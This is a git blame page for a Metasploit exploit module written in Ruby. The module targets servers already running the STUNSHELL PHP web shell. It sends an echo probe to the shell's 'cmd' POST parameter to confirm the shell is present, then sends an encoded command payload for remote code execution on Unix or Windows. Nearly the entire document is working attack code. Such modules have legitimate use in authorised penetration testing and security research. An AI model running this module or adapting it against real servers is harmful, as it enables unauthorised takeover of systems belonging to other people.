Files
metasploit-gs/modules/exploits/multi/http/stunshell_exec.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

101 lines
2.8 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2013-03-27 17:03:18 -04:00
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
2025-06-20 13:20:44 +01:00
def initialize(info = {})
super(
update_info(
info,
'Name' => 'STUNSHELL Web Shell Remote Code Execution',
'Description' => %q{
2013-03-28 14:45:51 +01:00
This module exploits unauthenticated versions of the "STUNSHELL" web shell.
2025-06-20 13:20:44 +01:00
This module works when safe mode is disabled on the web server. This shell is
widely used in automated RFI payloads.
},
'License' => MSF_LICENSE,
'Author' => [
2013-03-28 14:45:51 +01:00
'bwall <bwall[at]openbwall.com>' # vuln discovery & msf module
],
2025-06-20 13:20:44 +01:00
'References' => [
['OSVDB', '91842'],
['URL', 'https://defense.ballastsecurity.net/wiki/index.php/STUNSHELL'],
2013-03-27 17:15:34 -04:00
['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=a4cd8ba05eb6ba7fb86dd66bed968007']
],
2025-06-20 13:20:44 +01:00
'Privileged' => false,
'Payload' => {
'Space' => 10000, # Value determined by web server's POST limits
'BadChars' => '',
'DisableNops' => true,
2025-06-20 13:20:44 +01:00
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
2025-06-20 13:20:44 +01:00
'Platform' => %w{unix win},
'Arch' => ARCH_CMD,
'Targets' => [
2013-03-27 17:03:18 -04:00
['stunshell / Unix', { 'Platform' => 'unix' } ],
['stunshell / Windows', { 'Platform' => 'win' } ]
],
2025-06-20 13:20:44 +01:00
'DisclosureDate' => '2013-03-23',
'DefaultTarget' => 0,
'Notes' => {
2025-06-23 12:43:46 +01:00
'Reliability' => UNKNOWN_RELIABILITY,
'Stability' => UNKNOWN_STABILITY,
'SideEffects' => UNKNOWN_SIDE_EFFECTS
}
2025-06-20 13:20:44 +01:00
)
)
register_options(
[
2025-06-20 13:20:44 +01:00
OptString.new('TARGETURI', [true, "The path to the andalas_oku shell", "/IDC.php"]),
]
)
end
def check
2013-03-28 14:45:51 +01:00
uri = normalize_uri(target_uri.path.to_s)
request_parameters = {
2013-03-27 17:03:18 -04:00
'method' => 'POST',
2025-06-20 13:20:44 +01:00
'uri' => uri,
2013-03-27 17:03:18 -04:00
'vars_post' =>
{
'cmd' => "echo 'andalas_oku test parameter'"
}
}
shell = send_request_cgi(request_parameters)
if (shell and shell.body =~ /andalas_oku test parameter/)
return Exploit::CheckCode::Vulnerable
end
2025-06-20 13:20:44 +01:00
return Exploit::CheckCode::Safe
end
2013-03-27 17:03:18 -04:00
def http_send_command(cmd)
2013-03-28 14:45:51 +01:00
uri = normalize_uri(target_uri.path.to_s)
request_parameters = {
2013-03-27 17:03:18 -04:00
'method' => 'POST',
2025-06-20 13:20:44 +01:00
'uri' => uri,
2013-03-27 17:03:18 -04:00
'vars_post' =>
{
'cmd' => cmd
}
}
res = send_request_cgi(request_parameters)
if not (res and res.code == 200)
2013-08-15 14:14:46 -05:00
fail_with(Failure::Unknown, 'Failed to execute the command.')
end
end
def exploit
http_send_command(payload.encoded)
end
end